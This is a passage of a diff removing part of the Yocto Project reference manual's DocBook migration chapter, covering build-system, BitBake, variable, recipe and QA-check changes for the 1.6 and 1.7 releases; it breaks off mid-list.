-                    <filename>base-files</filename>: Remove the unnecessary
-                    <filename>media/</filename><replaceable>xxx</replaceable> directories.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>alsa-state</filename>: Provide an empty
-                    <filename>asound.conf</filename> by default.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>classes/image</filename>: Ensure
-                    <link linkend='var-BAD_RECOMMENDATIONS'><filename>BAD_RECOMMENDATIONS</filename></link>
-                    supports pre-renamed package names.</para></listitem>
-                <listitem><para>
-                    <filename>classes/rootfs_rpm</filename>: Implement
-                    <filename>BAD_RECOMMENDATIONS</filename> for RPM.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>systemd</filename>: Remove
-                    <filename>systemd_unitdir</filename> if
-                    <filename>systemd</filename> is not in
-                    <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>systemd</filename>: Remove
-                    <filename>init.d</filename> dir if
-                    <filename>systemd</filename> unit file is present and
-                    <filename>sysvinit</filename> is not a distro feature.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>libpam</filename>: Deny all services for the
-                    <filename>OTHER</filename> entries.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>image.bbclass</filename>: Move
-                    <filename>runtime_mapping_rename</filename> to avoid
-                    conflict with <filename>multilib</filename>.
-                    See
-                    <ulink url='https://bugzilla.yoctoproject.org/show_bug.cgi?id=4993'><filename>YOCTO #4993</filename></ulink>
-                    in Bugzilla for more information.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>linux-dtb</filename>: Use kernel build system
-                    to generate the <filename>dtb</filename> files.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>kern-tools</filename>: Switch from guilt to
-                    new <filename>kgit-s2q</filename> tool.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-
-<section id='moving-to-the-yocto-project-1.6-release'>
-    <title>Moving to the Yocto Project 1.6 Release</title>
-
-    <para>
-        This section provides migration information for moving to the
-        Yocto Project 1.6 Release from the prior release.
-    </para>
-
-
-    <section id='migration-1.6-archiver-class'>
-        <title><filename>archiver</filename> Class</title>
-
-        <para>
-            The
-            <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
-            class has been rewritten and its configuration has been simplified.
-            For more details on the source archiver, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-open-source-license-compliance-during-your-products-lifecycle'>Maintaining Open Source License Compliance During Your Product's Lifecycle</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-        </para>
-    </section>
-
-    <section id='migration-1.6-packaging-changes'>
-        <title>Packaging Changes</title>
-
-        <para>
-            The following packaging changes have been made:
-            <itemizedlist>
-                <listitem><para>
-                    The <filename>binutils</filename> recipe no longer produces
-                    a <filename>binutils-symlinks</filename> package.
-                    <filename>update-alternatives</filename> is now used to
-                    handle the preferred <filename>binutils</filename>
-                    variant on the target instead.
-                    </para></listitem>
-                <listitem><para>
-                    The tc (traffic control) utilities have been split out of
-                    the main <filename>iproute2</filename> package and put
-                    into the <filename>iproute2-tc</filename> package.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>gtk-engines</filename> schemas have been
-                    moved to a dedicated
-                    <filename>gtk-engines-schemas</filename> package.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>armv7a</filename> with thumb package
-                    architecture suffix has changed.
-                    The suffix for these packages with the thumb
-                    optimization enabled is "t2" as it should be.
-                    Use of this suffix was not the case in the 1.5 release.
-                    Architecture names will change within package feeds as a
-                    result.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-1.6-bitbake'>
-        <title>BitBake</title>
-
-        <para>
-            The following changes have been made to
-            <link linkend='bitbake-term'>BitBake</link>.
-        </para>
-
-        <section id='migration-1.6-matching-branch-requirement-for-git-fetching'>
-            <title>Matching Branch Requirement for Git Fetching</title>
-
-            <para>
-                When fetching source from a Git repository using
-                <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>,
-                BitBake will now validate the
-                <link linkend='var-SRCREV'><filename>SRCREV</filename></link>
-                value against the branch.
-                You can specify the branch using the following form:
-                <literallayout class='monospaced'>
-     SRC_URI = "git://server.name/repository;branch=<replaceable>branchname</replaceable>"
-                </literallayout>
-                If you do not specify a branch, BitBake looks
-                in the default "master" branch.
-            </para>
-
-            <para>
-                Alternatively, if you need to bypass this check (e.g.
-                if you are fetching a revision corresponding to a tag that
-                is not on any branch), you can add ";nobranch=1" to
-                the end of the URL within <filename>SRC_URI</filename>.
-            </para>
-        </section>
-
-        <section id='migration-1.6-bitbake-deps'>
-            <title>Python Definition substitutions</title>
-
-            <para>
-                BitBake had some previously deprecated Python definitions
-                within its <filename>bb</filename> module removed.
-                You should use their sub-module counterparts instead:
-                <itemizedlist>
-                    <listitem><para><filename>bb.MalformedUrl</filename>:
-                        Use <filename>bb.fetch.MalformedUrl</filename>.
-                        </para></listitem>
-                    <listitem><para><filename>bb.encodeurl</filename>:
-                        Use <filename>bb.fetch.encodeurl</filename>.
-                        </para></listitem>
-                    <listitem><para><filename>bb.decodeurl</filename>:
-                        Use <filename>bb.fetch.decodeurl</filename>
-                        </para></listitem>
-                    <listitem><para><filename>bb.mkdirhier</filename>:
-                        Use <filename>bb.utils.mkdirhier</filename>.
-                        </para></listitem>
-                    <listitem><para><filename>bb.movefile</filename>:
-                        Use <filename>bb.utils.movefile</filename>.
-                        </para></listitem>
-                    <listitem><para><filename>bb.copyfile</filename>:
-                        Use <filename>bb.utils.copyfile</filename>.
-                        </para></listitem>
-                    <listitem><para><filename>bb.which</filename>:
-                        Use <filename>bb.utils.which</filename>.
-                        </para></listitem>
-                    <listitem><para><filename>bb.vercmp_string</filename>:
-                        Use <filename>bb.utils.vercmp_string</filename>.
-                        </para></listitem>
-                    <listitem><para><filename>bb.vercmp</filename>:
-                        Use <filename>bb.utils.vercmp</filename>.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='migration-1.6-bitbake-fetcher'>
-            <title>SVK Fetcher</title>
-
-            <para>
-                The SVK fetcher has been removed from BitBake.
-            </para>
-        </section>
-
-        <section id='migration-1.6-bitbake-console-output'>
-            <title>Console Output Error Redirection</title>
-
-            <para>
-                The BitBake console UI will now output errors to
-                <filename>stderr</filename> instead of
-                <filename>stdout</filename>.
-                Consequently, if you are piping or redirecting the output of
-                <filename>bitbake</filename> to somewhere else, and you wish
-                to retain the errors, you will need to add
-                <filename>2>&amp;1</filename> (or something similar) to the
-                end of your <filename>bitbake</filename> command line.
-            </para>
-        </section>
-
-        <section id='migration-1.6-task-taskname-overrides'>
-            <title><filename>task-</filename><replaceable>taskname</replaceable> Overrides</title>
-
-            <para>
-                <filename>task-</filename><replaceable>taskname</replaceable> overrides have been
-                adjusted so that tasks whose names contain underscores have the
-                underscores replaced by hyphens for the override so that they
-                now function properly.
-                For example, the task override for
-                <link linkend='ref-tasks-populate_sdk'><filename>do_populate_sdk</filename></link>
-                is <filename>task-populate-sdk</filename>.
-            </para>
-        </section>
-    </section>
-
-    <section id='migration-1.6-variable-changes'>
-        <title>Changes to Variables</title>
-
-        <para>
-            The following variables have changed.
-            For information on the OpenEmbedded build system variables, see the
-            "<link linkend='ref-variables-glos'>Variables Glossary</link>" Chapter.
-        </para>
-
-        <section id='migration-1.6-variable-changes-TMPDIR'>
-            <title><filename>TMPDIR</filename></title>
-
-            <para>
-                <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
-                can no longer be on an NFS mount.
-                NFS does not offer full POSIX locking and inode consistency
-                and can cause unexpected issues if used to store
-                <filename>TMPDIR</filename>.
-            </para>
-
-            <para>
-                The check for this occurs on startup.
-                If <filename>TMPDIR</filename> is detected on an NFS mount,
-                an error occurs.
-            </para>
-        </section>
-
-        <section id='migration-1.6-variable-changes-PRINC'>
-            <title><filename>PRINC</filename></title>
-
-            <para>
-                The <filename>PRINC</filename>
-                variable has been deprecated and triggers a warning if
-                detected during a build.
-                For
-                <link linkend='var-PR'><filename>PR</filename></link>
-                increments on changes, use the PR service instead.
-                You can find out more about this service in the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#working-with-a-pr-service'>Working With a PR Service</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-            </para>
-        </section>
-
-        <section id='migration-1.6-variable-changes-IMAGE_TYPES'>
-            <title><filename>IMAGE_TYPES</filename></title>
-
-            <para>
-                The "sum.jffs2" option for
-                <link linkend='var-IMAGE_TYPES'><filename>IMAGE_TYPES</filename></link>
-                has been replaced by the "jffs2.sum" option, which fits the
-                processing order.
-            </para>
-        </section>
-
-        <section id='migration-1.6-variable-changes-COPY_LIC_MANIFEST'>
-            <title><filename>COPY_LIC_MANIFEST</filename></title>
-
-            <para>
-                The
-                <link linkend='var-COPY_LIC_MANIFEST'><filename>COPY_LIC_MANIFEST</filename></link>
-                variable must
-                now be set to "1" rather than any value in order to enable
-                it.
-            </para>
-        </section>
-
-        <section id='migration-1.6-variable-changes-COPY_LIC_DIRS'>
-            <title><filename>COPY_LIC_DIRS</filename></title>
-
-            <para>
-                The
-                <link linkend='var-COPY_LIC_DIRS'><filename>COPY_LIC_DIRS</filename></link>
-                variable must
-                now be set to "1" rather than any value in order to enable
-                it.
-            </para>
-        </section>
-
-        <section id='migration-1.6-variable-changes-PACKAGE_GROUP'>
-            <title><filename>PACKAGE_GROUP</filename></title>
-
-            <para>
-                The
-                <filename>PACKAGE_GROUP</filename> variable has been renamed to
-                <link linkend='var-FEATURE_PACKAGES'><filename>FEATURE_PACKAGES</filename></link>
-                to more accurately reflect its purpose.
-                You can still use <filename>PACKAGE_GROUP</filename> but
-                the OpenEmbedded build system produces a warning message when
-                it encounters the variable.
-            </para>
-        </section>
-
-        <section id='migration-1.6-variable-changes-variable-entry-behavior'>
-            <title>Preprocess and Post Process Command Variable Behavior</title>
-
-            <para>
-                The following variables now expect a semicolon separated
-                list of functions to call and not arbitrary shell commands:
-                <literallayout class='monospaced'>
-     <link linkend='var-ROOTFS_PREPROCESS_COMMAND'>ROOTFS_PREPROCESS_COMMAND</link>
-     <link linkend='var-ROOTFS_POSTPROCESS_COMMAND'>ROOTFS_POSTPROCESS_COMMAND</link>
-     <link linkend='var-SDK_POSTPROCESS_COMMAND'>SDK_POSTPROCESS_COMMAND</link>
-     <link linkend='var-POPULATE_SDK_POST_TARGET_COMMAND'>POPULATE_SDK_POST_TARGET_COMMAND</link>
-     <link linkend='var-POPULATE_SDK_POST_HOST_COMMAND'>POPULATE_SDK_POST_HOST_COMMAND</link>
-     <link linkend='var-IMAGE_POSTPROCESS_COMMAND'>IMAGE_POSTPROCESS_COMMAND</link>
-     <link linkend='var-IMAGE_PREPROCESS_COMMAND'>IMAGE_PREPROCESS_COMMAND</link>
-     <link linkend='var-ROOTFS_POSTUNINSTALL_COMMAND'>ROOTFS_POSTUNINSTALL_COMMAND</link>
-     <link linkend='var-ROOTFS_POSTINSTALL_COMMAND'>ROOTFS_POSTINSTALL_COMMAND</link>
-                </literallayout>
-                For migration purposes, you can simply wrap shell commands in
-                a shell function and then call the function.
-                Here is an example:
-                <literallayout class='monospaced'>
-     my_postprocess_function() {
-        echo "hello" > ${IMAGE_ROOTFS}/hello.txt
-     }
-     ROOTFS_POSTPROCESS_COMMAND += "my_postprocess_function; "
-                </literallayout>
-            </para>
-        </section>
-    </section>
-
-    <section id='migration-1.6-package-test-ptest'>
-        <title>Package Test (ptest)</title>
-
-        <para>
-            Package Tests (ptest) are built but not installed by default.
-            For information on using Package Tests, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#testing-packages-with-ptest'>Testing Packages with ptest</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-            For information on the <filename>ptest</filename> class, see the
-            "<link linkend='ref-classes-ptest'><filename>ptest.bbclass</filename></link>"
-            section.
-        </para>
-    </section>
-
-    <section id='migration-1.6-build-changes'>
-        <title>Build Changes</title>
-
-        <para>
-            Separate build and source directories have been enabled
-            by default for selected recipes where it is known to work
-            (a whitelist) and for all recipes that inherit the
-            <link linkend='ref-classes-cmake'><filename>cmake</filename></link>
-            class.
-            In future releases the
-            <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
-            class will enable a separate build directory by default as
-            well.
-            Recipes building Autotools-based
-            software that fails to build with a separate build directory
-            should be changed to inherit from the
-            <link linkend='ref-classes-autotools'><filename>autotools-brokensep</filename></link>
-            class instead of the <filename>autotools</filename> or
-            <filename>autotools_stage</filename>classes.
-        </para>
-    </section>
-
-    <section id='migration-1.6-building-qemu-native'>
-        <title><filename>qemu-native</filename></title>
-
-        <para>
-            <filename>qemu-native</filename> now builds without
-            SDL-based graphical output support by default.
-            The following additional lines are needed in your
-            <filename>local.conf</filename> to enable it:
-            <literallayout class='monospaced'>
-     PACKAGECONFIG_pn-qemu-native = "sdl"
-     ASSUME_PROVIDED += "libsdl-native"
-            </literallayout>
-            <note>
-                The default <filename>local.conf</filename>
-                contains these statements.
-                Consequently, if you are building a headless system and using
-                a default <filename>local.conf</filename> file, you will need
-                comment these two lines out.
-            </note>
-        </para>
-    </section>
-
-    <section id='migration-1.6-core-image-basic'>
-        <title><filename>core-image-basic</filename></title>
-
-        <para>
-            <filename>core-image-basic</filename> has been renamed to
-            <filename>core-image-full-cmdline</filename>.
-        </para>
-
-        <para>
-            In addition to <filename>core-image-basic</filename> being renamed,
-            <filename>packagegroup-core-basic</filename> has been renamed to
-            <filename>packagegroup-core-full-cmdline</filename> to match.
-        </para>
-    </section>
-
-    <section id='migration-1.6-licensing'>
-        <title>Licensing</title>
-
-        <para>
-            The top-level <filename>LICENSE</filename> file has been changed
-            to better describe the license of the various components of
-            <link linkend='oe-core'>OE-Core</link>.
-            However, the licensing itself remains unchanged.
-        </para>
-
-        <para>
-            Normally, this change would not cause any side-effects.
-            However, some recipes point to this file within
-            <link linkend='var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></link>
-            (as <filename>${COREBASE}/LICENSE</filename>) and thus the
-            accompanying checksum must be changed from
-            3f40d7994397109285ec7b81fdeb3b58 to
-            4d92cd373abda3937c2bc47fbc49d690.
-            A better alternative is to have
-            <filename>LIC_FILES_CHKSUM</filename> point to a file
-            describing the license that is distributed with the source
-            that the recipe is building, if possible, rather than pointing
-            to <filename>${COREBASE}/LICENSE</filename>.
-        </para>
-    </section>
-
-    <section id='migration-1.6-cflags-options'>
-        <title><filename>CFLAGS</filename> Options</title>
-
-        <para>
-            The "-fpermissive" option has been removed from the default
-            <link linkend='var-CFLAGS'><filename>CFLAGS</filename></link>
-            value.
-            You need to take action on individual recipes that fail when
-            building with this option.
-            You need to either patch the recipes to fix the issues reported by
-            the compiler, or you need to add "-fpermissive" to
-            <filename>CFLAGS</filename> in the recipes.
-        </para>
-    </section>
-
-    <section id='migration-1.6-custom-images'>
-        <title>Custom Image Output Types</title>
-
-        <para>
-            Custom image output types, as selected using
-            <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>,
-            must declare their dependencies on other image types (if any) using
-            a new
-            <link linkend='var-IMAGE_TYPEDEP'><filename>IMAGE_TYPEDEP</filename></link>
-            variable.
-        </para>
-    </section>
-
-    <section id='migration-1.6-do-package-write-task'>
-        <title>Tasks</title>
-
-        <para>
-            The <filename>do_package_write</filename> task has been removed.
-            The task is no longer needed.
-        </para>
-    </section>
-
-    <section id='migration-1.6-update-alternatives-provider'>
-        <title><filename>update-alternative</filename> Provider</title>
-
-        <para>
-            The default <filename>update-alternatives</filename> provider has
-            been changed from <filename>opkg</filename> to
-            <filename>opkg-utils</filename>.
-            This change resolves some troublesome circular dependencies.
-            The runtime package has also been renamed from
-            <filename>update-alternatives-cworth</filename>
-            to <filename>update-alternatives-opkg</filename>.
-        </para>
-    </section>
-
-    <section id='migration-1.6-virtclass-overrides'>
-        <title><filename>virtclass</filename> Overrides</title>
-
-        <para>
-            The <filename>virtclass</filename> overrides are now deprecated.
-            Use the equivalent class overrides instead (e.g.
-            <filename>virtclass-native</filename> becomes
-            <filename>class-native</filename>.)
-        </para>
-    </section>
-
-    <section id='migration-1.6-removed-renamed-recipes'>
-        <title>Removed and Renamed Recipes</title>
-
-        <para>
-            The following recipes have been removed:
-            <itemizedlist>
-                <listitem><para><filename>packagegroup-toolset-native</filename> -
-                    This recipe is largely unused.
-                    </para></listitem>
-                <listitem><para><filename>linux-yocto-3.8</filename> -
-                    Support for the Linux yocto 3.8 kernel has been dropped.
-                    Support for the 3.10 and 3.14 kernels have been added
-                    with the <filename>linux-yocto-3.10</filename> and
-                    <filename>linux-yocto-3.14</filename> recipes.
-                    </para></listitem>
-                <listitem><para><filename>ocf-linux</filename> -
-                    This recipe has been functionally replaced using
-                    <filename>cryptodev-linux</filename>.
-                    </para></listitem>
-                <listitem><para><filename>genext2fs</filename> -
-                    <filename>genext2fs</filename> is no longer used by the
-                    build system and is unmaintained upstream.
-                    </para></listitem>
-                <listitem><para><filename>js</filename> -
-                    This provided an ancient version of Mozilla's javascript
-                    engine that is no longer needed.
-                    </para></listitem>
-                <listitem><para><filename>zaurusd</filename> -
-                    The recipe has been moved to the
-                    <filename>meta-handheld</filename> layer.
-                    </para></listitem>
-                <listitem><para><filename>eglibc 2.17</filename> -
-                    Replaced by the <filename>eglibc 2.19</filename>
-                    recipe.
-                    </para></listitem>
-                <listitem><para><filename>gcc 4.7.2</filename> -
-                    Replaced by the now stable
-                    <filename>gcc 4.8.2</filename>.
-                    </para></listitem>
-                <listitem><para><filename>external-sourcery-toolchain</filename> -
-                    this recipe is now maintained in the
-                    <filename>meta-sourcery</filename> layer.
-                    </para></listitem>
-                <listitem><para><filename>linux-libc-headers-yocto 3.4+git</filename> -
-                    Now using version 3.10 of the
-                    <filename>linux-libc-headers</filename> by default.
-                    </para></listitem>
-                <listitem><para><filename>meta-toolchain-gmae</filename> -
-                    This recipe is obsolete.
-                    </para></listitem>
-                <listitem><para><filename>packagegroup-core-sdk-gmae</filename> -
-                    This recipe is obsolete.
-                    </para></listitem>
-                <listitem><para><filename>packagegroup-core-standalone-gmae-sdk-target</filename> -
-                    This recipe is obsolete.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-1.6-removed-classes'>
-        <title>Removed Classes</title>
-
-        <para>
-            The following classes have become obsolete and have been removed:
-            <itemizedlist>
-                <listitem><para><filename>module_strip</filename>
-                    </para></listitem>
-                <listitem><para><filename>pkg_metainfo</filename>
-                    </para></listitem>
-                <listitem><para><filename>pkg_distribute</filename>
-                    </para></listitem>
-                <listitem><para><filename>image-empty</filename>
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-1.6-reference-bsps'>
-        <title>Reference Board Support Packages (BSPs)</title>
-
-        <para>
-            The following reference BSPs changes occurred:
-            <itemizedlist>
-                <listitem><para>The BeagleBoard
-                    (<filename>beagleboard</filename>) ARM reference hardware
-                    has been replaced by the BeagleBone
-                    (<filename>beaglebone</filename>) hardware.
-                    </para></listitem>
-                <listitem><para>The RouterStation Pro
-                    (<filename>routerstationpro</filename>) MIPS reference
-                    hardware has been replaced by the EdgeRouter Lite
-                    (<filename>edgerouter</filename>) hardware.
-                    </para></listitem>
-            </itemizedlist>
-            The previous reference BSPs for the
-            <filename>beagleboard</filename> and
-            <filename>routerstationpro</filename> machines are still available
-            in a new <filename>meta-yocto-bsp-old</filename> layer in the
-            <ulink url='&YOCTO_GIT_URL;'>Source Repositories</ulink>
-            at
-            <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/meta-yocto-bsp-old/'>http://git.yoctoproject.org/cgit/cgit.cgi/meta-yocto-bsp-old/</ulink>.
-        </para>
-    </section>
-</section>
-
-<section id='moving-to-the-yocto-project-1.7-release'>
-    <title>Moving to the Yocto Project 1.7 Release</title>
-
-    <para>
-        This section provides migration information for moving to the
-        Yocto Project 1.7 Release from the prior release.
-    </para>
-
-    <section id='migration-1.7-changes-to-setting-qemu-packageconfig-options'>
-        <title>Changes to Setting QEMU <filename>PACKAGECONFIG</filename> Options in <filename>local.conf</filename></title>
-
-        <para>
-            The QEMU recipe now uses a number of
-            <link linkend='var-PACKAGECONFIG'><filename>PACKAGECONFIG</filename></link>
-            options to enable various optional features.
-            The method used to set defaults for these options means that
-            existing
-            <filename>local.conf</filename> files will need to be be
-            modified to append to <filename>PACKAGECONFIG</filename> for
-            <filename>qemu-native</filename> and
-            <filename>nativesdk-qemu</filename> instead of setting it.
-            In other words, to enable graphical output for QEMU, you should
-            now have these lines in <filename>local.conf</filename>:
-            <literallayout class='monospaced'>
-     PACKAGECONFIG_append_pn-qemu-native = " sdl"
-     PACKAGECONFIG_append_pn-nativesdk-qemu = " sdl"
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='migration-1.7-minimum-git-version'>
-        <title>Minimum Git version</title>
-
-        <para>
-            The minimum
-            <ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink> version
-            required on the build host is now 1.7.8 because the
-            <filename>--list</filename> option is now required by
-            BitBake's Git fetcher.
-            As always, if your host distribution does not provide a version of
-            Git that meets this requirement, you can use the
-            <filename>buildtools-tarball</filename> that does.
-            See the
-            "<link linkend='required-git-tar-python-and-gcc-versions'>Required Git, tar, Python and gcc Versions</link>"
-            section for more information.
-        </para>
-    </section>
-
-    <section id='migration-1.7-autotools-class-changes'>
-        <title>Autotools Class Changes</title>
-
-        <para>
-            The following
-            <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
-            class changes occurred:
-            <itemizedlist>
-                <listitem><para><emphasis>
-                    A separate build directory is now used by default:</emphasis>
-                    The <filename>autotools</filename> class has been changed
-                    to use a directory for building
-                    (<link linkend='var-B'><filename>B</filename></link>),
-                    which is separate from the source directory
-                    (<link linkend='var-S'><filename>S</filename></link>).
-                    This is commonly referred to as
-                    <filename>B != S</filename>, or an out-of-tree build.</para>
-                    <para>If the software being built is already capable of
-                    building in a directory separate from the source, you
-                    do not need to do anything.
-                    However, if the software is not capable of being built
-                    in this manner, you will
-                    need to either patch the software so that it can build
-                    separately, or you will need to change the recipe to
-                    inherit the
-                    <link linkend='ref-classes-autotools'><filename>autotools-brokensep</filename></link>
-                    class instead of the <filename>autotools</filename> or
-                    <filename>autotools_stage</filename> classes.
-                    </para></listitem>
-                <listitem><para><emphasis>
-                    The <filename>--foreign</filename> option is
-                    no longer passed to <filename>automake</filename> when
-                    running <filename>autoconf</filename>:</emphasis>
-                    This option tells <filename>automake</filename> that a
-                    particular software package does not follow the GNU
-                    standards and therefore should not be expected
-                    to distribute certain files such as
-                    <filename>ChangeLog</filename>,
-                    <filename>AUTHORS</filename>, and so forth.
-                    Because the majority of upstream software packages already
-                    tell <filename>automake</filename> to enable foreign mode
-                    themselves, the option is mostly superfluous.
-                    However, some recipes will need patches for this change.
-                    You can easily make the change by patching
-                    <filename>configure.ac</filename> so that it passes
-                    "foreign" to <filename>AM_INIT_AUTOMAKE()</filename>.
-                    See
-                    <ulink url='http://cgit.openembedded.org/openembedded-core/commit/?id=01943188f85ce6411717fb5bf702d609f55813f2'>this commit</ulink>
-                    for an example showing how to make the patch.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-1.7-binary-configuration-scripts-disabled'>
-        <title>Binary Configuration Scripts Disabled</title>
-
-        <para>
-            Some of the core recipes that package binary configuration scripts
-            now disable the scripts due to the
-            scripts previously requiring error-prone path substitution.
-            Software that links against these libraries using these scripts
-            should use the much more robust <filename>pkg-config</filename>
-            instead.
-            The list of recipes changed in this version (and their
-            configuration scripts) is as follows:
-            <literallayout class='monospaced'>
-     directfb (directfb-config)
-     freetype (freetype-config)
-     gpgme (gpgme-config)
-     libassuan (libassuan-config)
-     libcroco (croco-6.0-config)
-     libgcrypt (libgcrypt-config)
-     libgpg-error (gpg-error-config)
-     libksba (ksba-config)
-     libpcap (pcap-config)
-     libpcre (pcre-config)
-     libpng (libpng-config, libpng16-config)
-     libsdl (sdl-config)
-     libusb-compat (libusb-config)
-     libxml2 (xml2-config)
-     libxslt (xslt-config)
-     ncurses (ncurses-config)
-     neon (neon-config)
-     npth (npth-config)
-     pth (pth-config)
-     taglib (taglib-config)
-            </literallayout>
-            Additionally, support for <filename>pkg-config</filename> has been
-            added to some recipes in the previous list in the rare cases
-            where the upstream software package does not already provide
-            it.
-        </para>
-    </section>
-
-    <section id='migration-1.7-glibc-replaces-eglibc'>
-        <title><filename>eglibc 2.19</filename> Replaced with <filename>glibc 2.20</filename></title>
-
-        <para>
-            Because <filename>eglibc</filename> and
-            <filename>glibc</filename> were already fairly close, this
-            replacement should not require any significant changes to other
-            software that links to <filename>eglibc</filename>.
-            However, there were a number of minor changes in
-            <filename>glibc 2.20</filename> upstream that could require
-            patching some software (e.g. the removal of the
-            <filename>_BSD_SOURCE</filename> feature test macro).
-        </para>
-
-        <para>
-            <filename>glibc 2.20</filename> requires version 2.6.32 or greater
-            of the Linux kernel.
-            Thus, older kernels will no longer be usable in conjunction with it.
-        </para>
-
-        <para>
-            For full details on the changes in <filename>glibc 2.20</filename>,
-            see the upstream release notes
-            <ulink url='https://sourceware.org/ml/libc-alpha/2014-09/msg00088.html'>here</ulink>.
-        </para>
-    </section>
-
-    <section id='migration-1.7-kernel-module-autoloading'>
-        <title>Kernel Module Autoloading</title>
-
-        <para>
-            The
-            <link linkend='var-module_autoload'><filename>module_autoload_*</filename></link>
-            variable is now deprecated and a new
-            <link linkend='var-KERNEL_MODULE_AUTOLOAD'><filename>KERNEL_MODULE_AUTOLOAD</filename></link>
-            variable should be used instead.
-            Also,
-            <link linkend='var-module_conf'><filename>module_conf_*</filename></link>
-            must now be used in conjunction with a new
-            <link linkend='var-KERNEL_MODULE_PROBECONF'><filename>KERNEL_MODULE_PROBECONF</filename></link>
-            variable.
-            The new variables no longer require you to specify the module name
-            as part of the variable name.
-            This change not only simplifies usage but also allows the values
-            of these variables to be appropriately incorporated into task
-            signatures and thus trigger the appropriate tasks to re-execute
-            when changed.
-            You should replace any references to
-            <filename>module_autoload_*</filename> with
-            <filename>KERNEL_MODULE_AUTOLOAD</filename>, and add any modules
-            for which <filename>module_conf_*</filename> is specified to
-            <filename>KERNEL_MODULE_PROBECONF</filename>.
-        </para>
-    </section>
-
-    <section id='migration-1.7-qa-check-changes'>
-        <title>QA Check Changes</title>
-
-        <para>
-            The following changes have occurred to the QA check process:
-            <itemizedlist>
-                <listitem><para>
-                    Additional QA checks <filename>file-rdeps</filename>
-                    and <filename>build-deps</filename> have been added in
-                    order to verify that file dependencies are satisfied
-                    (e.g. package contains a script requiring
-                    <filename>/bin/bash</filename>) and build-time dependencies
-                    are declared, respectively.
-                    For more information, please see the
-                    "<link linkend='ref-qa-checks'>QA Error and Warning Messages</link>"
-                    chapter.
-                    </para></listitem>
-                <listitem><para>
-                    Package QA checks are now performed during a new
-                    <link linkend='ref-tasks-package_qa'><filename>do_package_qa</filename></link>
-                    task rather than being part of the
-                    <link linkend='ref-tasks-package'><filename>do_package</filename></link>
-                    task.
-                    This allows more parallel execution.
-                    This change is unlikely to be an issue except for highly
-                    customized recipes that disable packaging tasks themselves
-                    by marking them as <filename>noexec</filename>.
-                    For those packages, you will need to disable the
-                    <filename>do_package_qa</filename> task as well.
-                    </para></listitem>
-                <listitem><para>
-                    Files being overwritten during the
-                    <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
-                    task now trigger an error instead of a warning.
-                    Recipes should not be overwriting files written to the
-                    sysroot by other recipes.
-                    If you have these types of recipes, you need to alter them
-                    so that they do not overwrite these files.</para>
-                    <para>You might now receive this error after changes in
-                    configuration or metadata resulting in orphaned files
-                    being left in the sysroot.
-                    If you do receive this error, the way to resolve the issue
-                    is to delete your
-                    <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
-                    or to move it out of the way and then re-start the build.
-                    Anything that has been fully built up to that point and
-                    does not need rebuilding will be restored from the shared
-                    state cache and the rest of the build will be able to
-                    proceed as normal.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-1.7-removed-recipes'>
-        <title>Removed Recipes</title>
-
-        <para>
-            The following recipes have been removed:
-            <itemizedlist>
-                <listitem><para>
-                    <filename>x-load</filename>:
-                    This recipe has been superseded by
-                    U-boot SPL for all Cortex-based TI SoCs.
-                    For legacy boards, the <filename>meta-ti</filename>
-                    layer, which contains a maintained recipe, should be used
-                    instead.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>ubootchart</filename>:
-                    This recipe is obsolete.
-                    A <filename>bootchart2</filename> recipe has been added
-                    to functionally replace it.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>linux-yocto 3.4</filename>:
-                    Support for the linux-yocto 3.4 kernel has been dropped.
-                    Support for the 3.10 and 3.14 kernels remains, while
-                    support for version 3.17 has been added.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>eglibc</filename> has been removed in favor of
-                    <filename>glibc</filename>.
-                    See the
-                    "<link linkend='migration-1.7-glibc-replaces-eglibc'><filename>eglibc 2.19</filename> Replaced with <filename>glibc 2.20</filename></link>"
-                    section for more information.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-1.7-miscellaneous-changes'>
-        <title>Miscellaneous Changes</title>
-
-        <para>
-            The following miscellaneous change occurred:
-            <itemizedlist>
-                <listitem><para>
-                    The build history feature now writes
-                    <filename>build-id.txt</filename> instead of
-                    <filename>build-id</filename>.
-                    Additionally, <filename>build-id.txt</filename>
-                    now contains the full build header as printed by
-                    BitBake upon starting the build.
-                    You should manually remove old "build-id" files from your
-                    existing build history repositories to avoid confusion.
